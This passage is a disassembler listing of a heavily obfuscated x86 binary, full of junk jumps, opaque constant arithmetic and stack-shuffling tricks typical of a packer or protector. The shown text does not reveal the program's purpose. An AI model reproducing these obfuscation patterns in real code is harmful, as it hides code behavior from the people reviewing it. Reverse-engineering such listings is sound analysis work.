; FUNCTION CHUNK AT 00443493 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004487E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448A9C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00452680 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452AA4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045ADB7 SIZE 00000011 BYTES
jo loc_452AA4
jmp loc_45ADB7
sub_440493 endp
; ---------------------------------------------------------------------------
shl ebx, 1Eh
jmp sub_44939A
; ---------------------------------------------------------------------------
loc_4404A6: ; CODE XREF: ut7h7i2x:loc_43BA84j
jl loc_444D97
cdq
xchg edx, [eax]
jmp loc_444D8C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44875F
loc_4404B4: ; CODE XREF: sub_44875F:loc_44173Fj
add eax, ebp
jmp loc_446D71
; END OF FUNCTION CHUNK FOR sub_44875F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_4404BB: ; CODE XREF: sub_43EF73:loc_44BFBBj
mov eax, 50h
push ebx
push 9FDF5635h
pop ebx
jmp loc_441457
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_4404CC: ; CODE XREF: sub_443BC5:loc_43E365j
jz loc_453C6D
jmp loc_44CB53
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_4404D7: ; CODE XREF: sub_44F495+1309j
push eax
mov eax, edx
xchg eax, [esp+8+var_8]
call sub_446B90
push 0A0412780h
pop eax
and eax, 1276FBD0h
jmp loc_44FC2C
; END OF FUNCTION CHUNK FOR sub_44F495
; =============== S U B R O U T I N E =======================================
sub_4404F3 proc near ; DATA XREF: ut7h7i2x:00446179o
var_4 = dword ptr -4
push 46E17520h
xchg ebp, [esp+4+var_4]
mov eax, ebp
pop ebp
xor eax, 10230260h
add eax, 0A9830865h
xchg eax, [esp+0]
jmp nullsub_24
sub_4404F3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_440512: ; CODE XREF: sub_444029:loc_44AA8Bj
rol eax, 19h
add eax, 5828138Fh
sub eax, 39634443h
xor eax, 0DA1C7E81h
add eax, ebp
loc_440529: ; CODE XREF: ut7h7i2x:loc_4579A0j
jmp loc_459EA2
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
loc_44052E: ; CODE XREF: ut7h7i2x:00448192j
test ecx, edi
jmp loc_444FF2
; ---------------------------------------------------------------------------
sub ecx, 0B56412D7h
jmp sub_43F071
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4490B0
loc_440540: ; CODE XREF: sub_4490B0:loc_4490BCj
xchg edi, [esp+0]
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_43C8BF
; END OF FUNCTION CHUNK FOR sub_4490B0
; ---------------------------------------------------------------------------
loc_44054E: ; CODE XREF: ut7h7i2x:004564E3j
test esi, 80000000h
jmp loc_44639E
; ---------------------------------------------------------------------------
and ecx, edi
jmp sub_456A74
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A76A
loc_440560: ; CODE XREF: sub_43A76A+AEB5j
mov eax, edx
and ebp, edi
jmp loc_44E823
; END OF FUNCTION CHUNK FOR sub_43A76A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445E9E
loc_440569: ; CODE XREF: sub_445E9E-740j
mov eax, [eax]
mov al, [eax]
js loc_459D31
sub al, 99h
jmp loc_43D097
; END OF FUNCTION CHUNK FOR sub_445E9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459760
loc_44057A: ; CODE XREF: sub_459760+Dj
xor eax, 1F3B8AD5h
and eax, 0FAAFE8C0h
add eax, 4F9FC58Ah
push offset sub_457902
jmp nullsub_389
; END OF FUNCTION CHUNK FOR sub_459760
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B122
loc_440596: ; CODE XREF: sub_44B122:loc_457C64j
jnz loc_440D78
loc_44059C: ; CODE XREF: ut7h7i2x:00447D82j
jmp loc_43CB3A
; END OF FUNCTION CHUNK FOR sub_44B122
; ---------------------------------------------------------------------------
pop edi
jmp loc_440D76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_4405A7: ; CODE XREF: sub_4503C3-7459j
pushf
or edx, 0D5D2B512h
or esi, ecx
loc_4405B0: ; CODE XREF: sub_4503C3-F253j
add ebx, 0ADF7E081h
xchg ebx, [esp+0]
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
or eax, eax
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_4405C0: ; CODE XREF: sub_43F1B2+4j
jnz loc_4533E7
jmp loc_44831C
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
locret_4405CB: ; CODE XREF: ut7h7i2x:0044E112j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4594B7
loc_4405CC: ; CODE XREF: sub_4594B7+1Ej
jmp loc_4540F7
; END OF FUNCTION CHUNK FOR sub_4594B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_4405D1: ; CODE XREF: sub_4459EE:loc_455E75j
xchg ecx, [esp+0]
jmp loc_442611
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
loc_4405D9: ; DATA XREF: sub_4580B3-8D47o
mov edx, 0A70158B4h
push offset loc_43AD05
jmp loc_454246
; ---------------------------------------------------------------------------
jge loc_44FA13
jmp loc_450173
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_4405F3: ; CODE XREF: sub_449E96+A368j
pop eax
or eax, ds:4000F7h
js loc_4428FA
jb loc_44A35D
cmp ebp, 42C7595Dh
jmp loc_4428F1
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
sbb esi, ebx
jmp sub_439431
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449AC2
loc_440618: ; CODE XREF: sub_449AC2+12j
xchg ecx, [esp+0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_449AC2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4455F4
loc_440620: ; CODE XREF: sub_4455F4:loc_444657j
jz loc_43E551
jmp loc_4487DD
; END OF FUNCTION CHUNK FOR sub_4455F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_44062B: ; CODE XREF: sub_44917B:loc_43EBCAj
; sub_44917B+B81Ej
mov eax, [ebp-14h]
add eax, 4CD6EEB9h
add eax, 0B32911ABh
mov eax, [eax]
loc_44063C: ; CODE XREF: sub_444273:loc_44BE57j
add eax, [ebp-18h]
push esi
push 6FED7A4Ch
pop esi
jmp loc_44DFB2
; END OF FUNCTION CHUNK FOR sub_44917B
; =============== S U B R O U T I N E =======================================
sub_44064B proc near ; CODE XREF: ut7h7i2x:loc_456703j
; DATA XREF: sub_4566F0+9o
; FUNCTION CHUNK AT 004396A5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043A2E8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E348 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F2FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FA03 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00447685 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453BB0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004558C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004574B0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004581E1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00459A10 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045A27F SIZE 00000005 BYTES
shl eax, 2
cdq
loc_44064F: ; CODE XREF: ut7h7i2x:0043DCF1j
call sub_4585B6
loc_440654: ; CODE XREF: sub_4423C1+546Cj
jmp loc_4396A5
sub_44064B endp
; ---------------------------------------------------------------------------
loc_440659: ; CODE XREF: ut7h7i2x:0043F71Dj
and edx, 4D3A3ADFh
loc_44065F: ; CODE XREF: ut7h7i2x:loc_43F708j
or edx, 0E763C138h
rol edx, 16h
and edx, 0BF662939h
jmp loc_4559B8
; ---------------------------------------------------------------------------
test eax, eax
jnz loc_43FEC0
jmp loc_441353
; ---------------------------------------------------------------------------
loc_440680: ; CODE XREF: ut7h7i2x:00442082j
sub ecx, 0E7C74BF2h
add ecx, 0F45C907Dh
add edx, ecx
pop ecx
pop edx
jmp loc_45566C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_440695: ; CODE XREF: sub_44EC11:loc_44877Aj
and ecx, edx
push ebx
jmp loc_453E3B
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_44069D: ; CODE XREF: sub_4459EE+C279j
jno loc_4522FE
mov ebp, 3291430Bh
push 0F37D35FDh
loc_4406AD: ; CODE XREF: ut7h7i2x:loc_441CDEj
push ecx
push 0C49A8D2Eh
jmp loc_444893
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_4406B8: ; CODE XREF: sub_43DBEC+131ACj
jo loc_43AA59
loc_4406BE: ; CODE XREF: sub_43DBEC:loc_44C41Fj
call nullsub_6
retn
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_4406C4: ; CODE XREF: sub_455807-7021j
jmp sub_444DE9
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_4406C9: ; CODE XREF: sub_43BA9E+5D2Dj
jmp nullsub_396
; END OF FUNCTION CHUNK FOR sub_43BA9E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_4406CF: ; CODE XREF: sub_445FA9+Bj
jmp loc_4463AD
; END OF FUNCTION CHUNK FOR sub_445FA9
; ---------------------------------------------------------------------------
loc_4406D4: ; CODE XREF: ut7h7i2x:00445765j
; ut7h7i2x:0044FAE9j
call sub_44E2C4
test al, al
jz loc_44517D
jmp loc_44B8F3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_235. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453790
loc_4406E7: ; CODE XREF: sub_453790+9j
jmp loc_440FD8
; END OF FUNCTION CHUNK FOR sub_453790
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_4406EC: ; CODE XREF: sub_453E14-18200j
jmp loc_43EAF4
; END OF FUNCTION CHUNK FOR sub_453E14
; =============== S U B R O U T I N E =======================================
sub_4406F1 proc near ; CODE XREF: ut7h7i2x:00457EDCj
; sub_439BF8+1F003p
; FUNCTION CHUNK AT 0043F253 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440149 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442014 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004450D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004456E6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00447993 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004493DA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004510A5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454165 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456C7A SIZE 00000017 BYTES
xchg esi, [esp+0]
pop esi
push 0B30230CFh
pop edx
xor edx, 686E3A92h
cmp edx, 0B2CA4035h
jmp loc_447993
sub_4406F1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44070C proc near ; DATA XREF: sub_44271B+Ao
; FUNCTION CHUNK AT 0044F81A SIZE 00000005 BYTES
mov edx, [edx]
imul byte ptr [edx]
push offset loc_44E354
jmp loc_44F81A
sub_44070C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_44071A: ; CODE XREF: sub_439AE7:loc_44B24Bj
xchg ebp, [esp+8+var_8]
mov esi, ebp
pop ebp
or esi, 10B96B58h
add esi, 628A9AF9h
xchg esi, [esp+4+var_4]
jmp loc_453FF1
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
loc_440734: ; CODE XREF: ut7h7i2x:00457ECCj
jl loc_43E509
test esi, 0F8648339h
jmp loc_458199
; ---------------------------------------------------------------------------
locret_440745: ; CODE XREF: ut7h7i2x:004407FEj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D79C
loc_440746: ; CODE XREF: sub_44D79C-8E66j
jmp sub_459043
; END OF FUNCTION CHUNK FOR sub_44D79C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442C48
loc_44074B: ; CODE XREF: sub_442C48-6BFAj
jmp nullsub_561
; END OF FUNCTION CHUNK FOR sub_442C48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CFB6
loc_440750: ; CODE XREF: sub_43CFB6:loc_4415BEj
cmp eax, 0F82FB672h
mov ebx, 8DAFCF1Dh
pop ebx
pop edx
pop ecx
jmp loc_45200A
; END OF FUNCTION CHUNK FOR sub_43CFB6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BFF8
loc_440763: ; CODE XREF: sub_43BFF8:loc_441DDFj
pop edx
add edx, 0EA750B13h
jnz loc_459871
loc_440770: ; CODE XREF: ut7h7i2x:00440A2Aj
jmp nullsub_42
; END OF FUNCTION CHUNK FOR sub_43BFF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4399B5
loc_440775: ; CODE XREF: sub_4399B5+3j
jmp loc_44B0FF
; END OF FUNCTION CHUNK FOR sub_4399B5
; ---------------------------------------------------------------------------
and eax, ebp
mov ebp, ecx
jmp loc_459871
; =============== S U B R O U T I N E =======================================
sub_440783 proc near ; CODE XREF: ut7h7i2x:00455B46j
; sub_440944+16322p
xchg ebx, [esp+0]
pop ebx
add eax, 7B3CC336h
ror eax, 0Ah
push offset loc_440C4E
jmp nullsub_36
sub_440783 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_44079B: ; CODE XREF: sub_44B789:loc_44BC01j
push esi
mov esi, ebp
xchg esi, [esp+0]
jmp loc_4505BB
; END OF FUNCTION CHUNK FOR sub_44B789
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452F03
loc_4407A6: ; CODE XREF: sub_452F03+Bj
pop esi
sub ebx, 0D84AA15Bh
xor ebx, 722C3F84h
sub ebx, 1CB4C6F7h
jmp loc_45595C
; END OF FUNCTION CHUNK FOR sub_452F03
; ---------------------------------------------------------------------------
test edx, ecx
loc_4407C0: ; CODE XREF: ut7h7i2x:00447867j
jmp loc_45A955
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_445. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459019
loc_4407C6: ; CODE XREF: sub_459019+Dj
jmp loc_4461F8
; END OF FUNCTION CHUNK FOR sub_459019
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4573BA
loc_4407CB: ; CODE XREF: sub_4573BA+23j
jmp loc_440BEE
; END OF FUNCTION CHUNK FOR sub_4573BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4563CB
loc_4407D0: ; CODE XREF: sub_4563CB+7j
mov edx, [esp+0]
push eax
mov eax, edx
call sub_4576A2
mov eax, [esp+4+var_4]
call sub_454196
jmp loc_45610C
; END OF FUNCTION CHUNK FOR sub_4563CB
; ---------------------------------------------------------------------------
add esi, edx
add edx, 0FD5DCEA0h
jmp sub_445A8C
; ---------------------------------------------------------------------------
push eax
ror eax, 6
push offset loc_44C713
jmp locret_440745
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FA51
loc_440803: ; CODE XREF: sub_44FA51:loc_44453Bj
push ecx
push offset sub_452C88
jmp nullsub_495
; END OF FUNCTION CHUNK FOR sub_44FA51
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446215
loc_44080E: ; CODE XREF: ut7h7i2x:loc_43D4B0j
; sub_446215:loc_44B644j
xchg esi, [esp+0]
mov edx, esi
pop esi
push offset loc_447C22
jmp sub_44996C
; END OF FUNCTION CHUNK FOR sub_446215
; =============== S U B R O U T I N E =======================================
sub_44081E proc near ; DATA XREF: sub_43B9B1+186C5o
; FUNCTION CHUNK AT 00439C5D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043B4BB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E4BC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00448896 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448948 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A494 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044BCC6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450F87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004516B0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045409D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457993 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004580C5 SIZE 00000005 BYTES
cmp dword ptr [ebp-4], 3
jnz loc_441F49
jmp loc_448948
sub_44081E endp
; =============== S U B R O U T I N E =======================================
sub_44082D proc near ; CODE XREF: ut7h7i2x:0043C8EBp
; ut7h7i2x:004480C1j
xchg ebx, [esp+0]
pop ebx
add esi, 5D045293h
mov [esi], eax
pop esi
sub_44082D endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_44083A: ; CODE XREF: sub_4442CC-49B6j
; sub_459B58-C4F4j
xor eax, 0E8C3EDE1h
call sub_44A0CE
loc_440845: ; CODE XREF: sub_44C42A+1Bj
jmp loc_44256E
; END OF FUNCTION CHUNK FOR sub_4442CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CED
loc_44084A: ; CODE XREF: sub_448CED+11j
rol ecx, 0Bh
or ecx, 192AD39h
test ecx, 2000000h
jmp loc_457D3C
; END OF FUNCTION CHUNK FOR sub_448CED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_44085E: ; CODE XREF: sub_43F1B2+E039j
; sub_45742F:loc_44DF9Ej
jl loc_459F6D
sub ecx, 40041726h
jmp loc_459F68
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44086F: ; CODE XREF: sub_447CBE:loc_43EE20j
jz loc_4484C7
jmp loc_448D82
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_44087A: ; CODE XREF: sub_454B2B-11420j
; sub_43DD17:loc_45750Dj
xchg esi, [esp-4+arg_0]
loc_44087D: ; CODE XREF: ut7h7i2x:0043921Bj
mov ebp, esp
add esp, 0FFFFFFF4h
; END OF FUNCTION CHUNK FOR sub_43DD17
; START OF FUNCTION CHUNK FOR sub_44445F
loc_440882: ; CODE XREF: sub_44445F+AEC4j
mov [ebp-8], eax
add edx, ebx
rol edx, 5
xor edx, ecx
jmp loc_43D5B9
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4576C6
loc_440891: ; CODE XREF: sub_4576C6:loc_44E58Bj
ror edi, 11h
jmp loc_4425C7
; END OF FUNCTION CHUNK FOR sub_4576C6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_282. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458DC5
loc_44089A: ; CODE XREF: sub_458DC5+Aj
jmp nullsub_546
; END OF FUNCTION CHUNK FOR sub_458DC5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447718
loc_44089F: ; CODE XREF: sub_447718:loc_44F52Dj
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_447718
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44577E
loc_4408A1: ; CODE XREF: sub_44577E+8j
jmp loc_44923C
; END OF FUNCTION CHUNK FOR sub_44577E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_4408A6: ; CODE XREF: sub_44CE09-E742j
jmp loc_440331
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_4408AB: ; CODE XREF: sub_450FDE-12A51j
jmp loc_45A60F
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4474B1
loc_4408B0: ; CODE XREF: sub_4474B1+1906j
; sub_4474B1+20CAj
inc dword ptr [ebp-18h]
dec dword ptr [ebp-1Ch]
jnz loc_44B6AB
jmp loc_454C5C
; END OF FUNCTION CHUNK FOR sub_4474B1
; ---------------------------------------------------------------------------
locret_4408C1: ; CODE XREF: ut7h7i2x:loc_4458C1j
retn
; =============== S U B R O U T I N E =======================================
sub_4408C2 proc near ; CODE XREF: sub_449700:loc_44B420p
; ut7h7i2x:00451F02j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043B776 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DB89 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043E526 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F335 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440BBD SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441DFE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442950 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442FAB SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00444505 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004450DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A014 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CA7D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044CEF0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D89D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044F78F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045320A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045572D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A604 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AA42 SIZE 0000000F BYTES
xchg ebx, [esp+0]
pop ebx
jns loc_44F79A
cmp dword ptr [ebp-4], 1
jnz loc_43DB89
jmp loc_441DFE
sub_4408C2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4408DB proc near ; DATA XREF: ut7h7i2x:004392E7o
; FUNCTION CHUNK AT 00443ED3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045400B SIZE 00000008 BYTES
add edi, 0B67D6F60h
mov [edi], eax
pop edi
lea eax, sub_443CE1
jmp loc_45400B
sub_4408DB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push offset sub_4427E3
jmp locret_44C712
; ---------------------------------------------------------------------------
loc_4408F9: ; CODE XREF: ut7h7i2x:0044265Fj
; ut7h7i2x:loc_447047j
mov eax, [esp]
call sub_4594B7
loc_440901: ; CODE XREF: ut7h7i2x:00442089j
; ut7h7i2x:0044AE64j
xchg eax, [esp]
mov edx, eax
call sub_43F058
pop edx
pop eax
jmp loc_43B781
; ---------------------------------------------------------------------------
loc_440912: ; DATA XREF: sub_453790-D663o
xor ecx, 0A8A77F9Ch
add ecx, ebp
add ecx, 0F1F34EA1h
mov [ecx], eax
jmp loc_44C279
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_222. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_440928: ; CODE XREF: ut7h7i2x:004446EAj
jmp locret_439A7E
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44092D proc near ; CODE XREF: sub_43B7C7p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B748 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043E72F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446DF9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004486D6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004499C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449AF1 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044BA3B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00451B89 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455A5E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455D95 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004580C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458F55 SIZE 00000005 BYTES
push ebp
mov ebp, esp
push esi
mov esi, ecx
jmp loc_455A5E
sub_44092D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_440938: ; CODE XREF: ut7h7i2x:0044D180j
jnp loc_43F8ED
jle loc_441787
; =============== S U B R O U T I N E =======================================
sub_440944 proc near ; CODE XREF: sub_444AA3+6p
; FUNCTION CHUNK AT 0043F646 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043FD55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004411F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442589 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00446FF4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00449EA8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044AE05 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044B5A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BAF4 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0044FADC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004566D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456C5A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045A9E1 SIZE 0000001C BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, ds:dword_44EE44
or eax, eax
jnz loc_442589
jmp loc_4566D5
sub_440944 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44095B: ; CODE XREF: ut7h7i2x:0044C66Bj
xchg ecx, [esp]
push 0F5A18F86h
pop ebx
rol ebx, 15h
jb loc_447840
sub ebx, 0D191E9C9h
cdq
jmp loc_447840
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_138. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_106. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458007
loc_44097B: ; CODE XREF: sub_458007+Aj
jmp nullsub_485
; END OF FUNCTION CHUNK FOR sub_458007
; ---------------------------------------------------------------------------
loc_440980: ; CODE XREF: ut7h7i2x:loc_43CFB1j
mov [ecx], eax
not eax
; START OF FUNCTION CHUNK FOR sub_44917B
loc_440984: ; CODE XREF: sub_44917B+B818j
jmp loc_442EC2
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
push eax
xor eax, 196A4D2Bh
jmp sub_44D7AC
; ---------------------------------------------------------------------------
loc_440995: ; DATA XREF: sub_45ABAC+6o
mov eax, [ebp+8]
push eax
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jmp loc_4540A9
; ---------------------------------------------------------------------------
loc_4409A8: ; CODE XREF: ut7h7i2x:00441B14j
mov ebp, 0B7466FCCh
rol ecx, 1Bh
sub ebp, 60558167h
loc_4409B6: ; CODE XREF: ut7h7i2x:loc_43B2DAj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_453CFA
jmp loc_44376C
; ---------------------------------------------------------------------------
loc_4409C7: ; DATA XREF: sub_445CE9:loc_449EBCo
mov eax, [ebp-20h]
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_4409CA: ; CODE XREF: sub_4524FE:loc_4391ADj
movzx eax, byte ptr [eax]
mov [ebp-1Ch], eax
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_43C454[eax*4]
mov [ebp-8], eax
jmp loc_447E91
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_4409E5: ; CODE XREF: sub_444273:loc_45704Bj
jl loc_449CDF
and edi, eax
jmp sub_449CD5
; END OF FUNCTION CHUNK FOR sub_444273
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_500. PRESS KEYPAD "+" TO EXPAND]
